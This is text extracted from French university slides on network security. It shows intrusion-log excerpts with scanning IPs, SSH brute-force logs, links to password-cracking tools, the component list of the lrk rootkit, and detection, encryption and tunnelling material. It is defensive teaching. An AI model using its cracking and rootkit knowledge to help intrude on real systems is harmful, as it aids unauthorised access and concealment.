112 4.8.153.86 246 lignes - lsanca1-ar56-4-8-153-086.lsanca1.dsl-verizon.net

112 67.123.125.162 245 lignes - 67-123-125-162.ded.pacbell.net

112 218.22.209.178 207 lignes - 218.22.209.178

112 61.153.27.154 201 lignes - 61.153.27.154

112 209.139.21.66 192 lignes - mail.imtstones.com


101/139

101

28/09/2012 - ENSICAEN - (c) dp 201


*** Les ports de destination les plus recherchs :154 4662 tcp edonkey 1108 lignes154 1214 tcp kazaa 102 lignes154 4665 tcp edonkey 51 lignes154 4664 tcp edonkey 46 lignes154 4663 tcp edonkey 41 lignes154 137 udp netbios-ns 17 lignes

154 138 udp netbios-dgm 16 lignes154 6889 udp 4 lignes154 6882 tcp 3 lignes154 1214 udp kazaa 2 lignes

28/09/2012 - ENSICAEN - (c) dp 202


*** SCAN a partir de 4.5.55.68 wbar2.sea1-4-5-055-068.sea1.dsl-verizon.net

44 ligne(s), 42 adresse(s), 1 port(s)** PORTS 135/tcp - loc-srv **ADRESSES

192.93.101.24 192.93.101.35 192.93.101.68 192.93.101.71192.93.101.76 192.93.101.77 192.93.101.89 192.93.101.96192.93.101.124 192.93.101.157 192.93.101.164 192.93.101.170192.93.101.204 192.93.101.214 192.93.101.234 192.93.117.0192.93.117.16 192.93.117.20 192.93.117.54 192.93.117.61192.93.117.109 192.93.117.159 192.93.117.178 192.93.212.6192.93.212.12 192.93.212.20 192.93.212.44 192.93.212.46192.93.212.58 192.93.212.79 192.93.212.87 192.93.212.95192.93.212.123 192.93.212.172 192.93.212.180 192.93.212.195192.93.212.206 192.93.212.220 192.93.212.228 192.93.212.245192.93.212.248 192.93.212.250


102/139

102

28/09/2012 - ENSICAEN - (c) dp 203

Vigilog: exemple de sortie----------------------------------------------------------------------LES HARCELEMENTS----------------------------------------------------------------------

*** ACL 112 - Entree Site

*** 200.31.197.180 -> 192.93.101.151 586 lignes mail.unad.gov.co ->sprv.ensicaen.fr PORT 139/tcp netbios-ssn 586 lignes

*** 202.147.224.102 -> 192.93.101.232 81 lignes 202.147.224.102 ->crchateigner.ensicaen.fr PORT 139/tcp netbios-ssn 81 lignes

*** 219.146.101.206 -> 192.93.101.138 104 lignes 219.146.101.206 ->spsc2.ensicaen.fr PORT 139/tcp netbios-ssn 104 lignes

*** 220.175.59.220 -> 192.93.101.232 106 lignes 220.175.59.220 ->crchateigner.ensicaen.fr PORT 139/tcp netbios-ssn 106 lignes

28/09/2012 - ENSICAEN - (c) dp 204

Craquage de mots de passe

Les mots de passe sont souvent un maillon faible dela scurit.

Le choix d'un mot de passe doit obir des rgles

strictes. Des outils existent pour dcrypter les mots de passe:

Pour unix: crack

http://www.crypticide.com/users/alecm/

John The Ripper http://www.openwall.com/john/

Pour windows: l0phtcrack http://www.atstake.com/


103/139

103

Un logiciel de stockage demot de passes De plus en plus de mots de passe retenir.

Les mots de passe doivent tre robustes.

On nutilise pas le mme mot de passe partout!

Les post-its sont dconseills pour les mmoriser ;)

Exemples de logiciel de stockage de mots de passe:

28/09/2012 - ENSICAEN - (c) dp 205

http://www.flyingbit.com/downloads http://keepass.info/

28/09/2012 - ENSICAEN - (c) dp 206

Exemple de logiciel decraquage


104/139

104

28/09/2012 - ENSICAEN - (c) dp 207

Exemple d'attaque sshSep 26 00:29:24 www sshd[16963]:Fail ed password for root from 80.88.158.137port 39464 ssh2Sep 26 00:29:29 www sshd[16965]:Fail ed password for root from 80.88.158.137port 39511 ssh2Sep 26 00:29:34 www sshd[16967]:Fail ed password for root from 80.88.158.137port 39554 ssh2Sep 26 00:29:39 www sshd[16969]:Fail ed password for root from 80.88.158.137port 39597 ssh2Sep 26 00:29:44 www sshd[16971]:Fail ed password for root from 80.88.158.137port 39643 ssh2Sep 26 00:29:49 www sshd[16973]:Fail ed password for root from 80.88.158.137port 39683 ssh2Sep 26 00:29:54 www sshd[16975]:Fail ed password for root from 80.88.158.137port 39729 ssh2Sep 26 00:29:59 www sshd[16977]:Fail ed password for root from 80.88.158.137port 39774 ssh2

Sep 23 20:58:17 www sshd[11025]:Fail ed password for invalid user tiffany from 63.237.87.70 port 42579 ssh2Sep 23 20:58:18 www sshd[11027]:Invalid user ti ffany from 63.237.87.70Sep 23 20:58:18 www sshd[11027]:error: Could not get shadow information for NOUSERSep 23 20:58:18 www sshd[11027]:Fail ed password for invalid user tiffany from 63.237.87.70 port 42673 ssh2Sep 23 20:58:19 www sshd[11029]:Invalid user ti ffany from 63.237.87.70Sep 23 20:58:19 www sshd[11029]:error: Could not get shadow information for NOUSERSep 23 20:58:19 www sshd[11029]:Fail ed password for invalid user tiffany from 63.237.87.70 port 42762 ssh2Sep 23 20:58:20 www sshd[11031]:Invalid user tracy from 63.237.87.70

Sep 23 20:58:20 www sshd[11031]:error: Could not get shadow information for NOUSERSep 23 20:58:20 www sshd[11031]:Fail ed password for invalid user tracy from 63.237.87.70 port 42858 ssh2Sep 23 20:58:21 www sshd[11033]:Invalid user tracy from 63.237.87.70Sep 23 20:58:21 www sshd[11033]:error: Could not get shadow information for NOUSER

28/09/2012 - ENSICAEN - (c) dp 208

RootKits

Un "rootkit" est dfini par la NSA:

A hacker security tool that captures passwords andmessage traffic to and from a computer. A collectionof tools that allows a hacker to provide a backdoorinto a system, collect information on other systemson the network, mask the fact that the system iscompromised, and much more. Rootkit is a classicexample of Trojan Horse software. Rootkit isavailable for a wide range of operating systems.


105/139

105

28/09/2012 - ENSICAEN - (c) dp 209

RootKits Souvent utilis par un intrus pour se dissimuler et

garder les accs privilgis qu'il a obtenu. Les premires alertes sur l'utilisation de rootkits

datent de fvrier 1994. Outil devenu trs populaire et qui complique la

dtection d'intrusion. Trs rpandu sur les machines SUN et Linux. Une rootkit classique contiendra un sniffer, des

logiciels avec backdoors comme inetd, login,,remplacera des commandes comme ps, netstat, ls, On pourra trouver galement des commandes denettoyage de logs (/var/log), etc.

28/09/2012 - ENSICAEN - (c) dp 210

Exemple de rootkit: lrkn chfn Trojaned! User->r00t chsh Trojaned! User->r00t inetd Trojaned! Remote access login Trojaned! Remote access ls Trojaned! Hide files du Trojaned! Hide files

i fconfi g Trojaned! H ide sni ffi ng netstat Trojaned! H ide connecti ons passwd Trojaned! U ser->r00t ps Trojaned! Hide processes top Trojaned! Hide processes rshd Trojaned! Remote access syslogd Trojaned! Hide logs linsniffer Packet sniffer! fix File fixer! z2 Zap2 utmp/wtmp/lastlog eraser! wted wtmp/utmp editor! lled lastlog editor! bind she ll po rt /shel l t ype d ae mo n! tcpd Trojaned! H ide connecti ons, a voi d deni es


106/139

106

28/09/2012 - ENSICAEN - (c) dp 211

Dtection de rootkits Si la machine est infecte, toutes les commandes locales sont

suspectes.

Dtection des ports ouverts non officiels (avec nmap sur une machineexterne). Par exemple l'inetd de lrk4 ouvre le port 5002.

Recherche des rpertoires spcifiques aux rootkits (par exemple/dev/ptry avec lrk4).

Utilitaires de dtection:unix: chkrootkit http://www.chkrootkit.org/

windows:rootkitrevealerhttp://www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtmlStrider GhostBusterhttp://research.microsoft.com/rootkit/F-Secure Blacklight http://www.f-secure.com/blacklight/

Se prmunir des rootkits:tripwire http://www.tripwire.com

28/09/2012 - ENSICAEN - (c) dp 212

Bibliothques Dynamiques Beaucoup de fichiers sont modifier pour

rester invisible.

Cependant, les binaires utilisent le conceptdes bibliothques dynamiques pour viterd'tre trop gros (dll sous windows, fichiers .sosous unix).

La modification d'une bibliothque dynamiquepeut suffire modifier plusieurs commandes.


107/139

107

28/09/2012 - ENSICAEN - (c) dp 213

Exemple bibliothquedynamique[root@ns /root]#ldd `which uptime` `which top` `which ps`/usr/bin/uptime:

libproc.so.2.0.0 => /lib/libproc.so.2.0.0 (0x40018000)libc.so.6 => /lib/libc.so.6 (0x40023000)/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

/usr/bin/top:libproc.so.2.0.0 => /lib/libproc.so.2.0.0 (0x40018000)libncurses.so.4 => /usr/lib/libncurses.so.4 (0x40023000)libc.so.6 => /lib/libc.so.6 (0x40060000)/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

/bin/ps:libproc.so.2.0.0 => /lib/libproc.so.2.0.0 (0x40018000)libc.so.6 => /lib/libc.so.6 (0x40023000)/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

28/09/2012 - ENSICAEN - (c) dp 214

Chiffrement, tunnelset vpn


108/139

108

Chiffrement de documents

Les documents importants doivent tre chiffrs.

Le chiffrement peut tre matriel (ordinateur portable avecdisque auto chiffrant, cl usb auto chiffrante, )

Le chiffremenr peut tre logiciel, beaucoup de logiciels existent.

winrar (chiffrement symtrique)

GnuPG (chiffrement asymtrique) Enigmail plugin de Thunderbird pour lchange de courrier

lectronique chiffr/sign.

Truecrypt: Chiffrement de disques, de partitions de disques,de cls USB.

28/09/2012 - ENSICAEN - (c) dp 215

28/09/2012 - ENSICAEN - (c) dp 216

Protocoles chiffrs

Les informations confidentielles doiventtransiter sur le rseau par des protocoleschiffrs:

Exemples: https plutt que http pops plutt que pop imaps plutt que imap smtps plutt que smtp etc.


109/139

109

28/09/2012 - ENSICAEN - (c) dp 217

Session chiffre ssh (Secure Shell) plutt que

telnet,rlogin,rsh,rcp Gnration d'une paire de clef RSA (toutes

les heures) par le serveur. Envoi de la clef publique au client qui se

connecte. Le client gnre une clef symtrique, la

chiffre avec la clef du serveur et la renvoie auserveur. Le reste de la communication est en

chiffrement symtrique.

28/09/2012 - ENSICAEN - (c) dp 218

Tunneling

Un protocole de tunneling est utilis pourcrer un chemin priv (tunnel) travers uneinfrastructure ventuellement publique.

Les donnes peuvent tre encapsules etcryptes pour emprunter le tunnel.

Solution intressante pour relier deux entitsdistantes moindre cot.


110/139

110

28/09/2012 - ENSICAEN - (c) dp 219

Tunneling ssh

Un flux tcp quelconque peut tre redirig dans untunnel ssh:

client serveur

client ssh serveur ssh

28/09/2012 - ENSICAEN - (c) dp 220

Exemple tunneling ssh

Client ssh (http://www.ssh.com)

Paramtres Outlook Express


111/139

111

28/09/2012 - ENSICAEN - (c) dp 221

Autre exemple de tunneling

Autre logiciel de tunneling: stunnel utilisant SSL(http://www.stunnel.org)

28/09/2012 - ENSICAEN - (c) dp 222

Configuration client courrier

Paramtres outlook express


112/139

112

28/09/2012 - ENSICAEN - (c) dp 223

Connexions TCP/IPscurises SSL (Secure Sockets Layer)

Se situe entre la couche application et lacouche transport.

Garantit l'authentification, l'intgrit et laconfidentialit.

Largement utilis pour la scurisation dessites www (https).

28/09/2012 - ENSICAEN - (c) dp 224

Fonctionnement SSL1) Hello, version de SSL, protocole de chiffrem

Documents

117790093-securite-informatique.pdf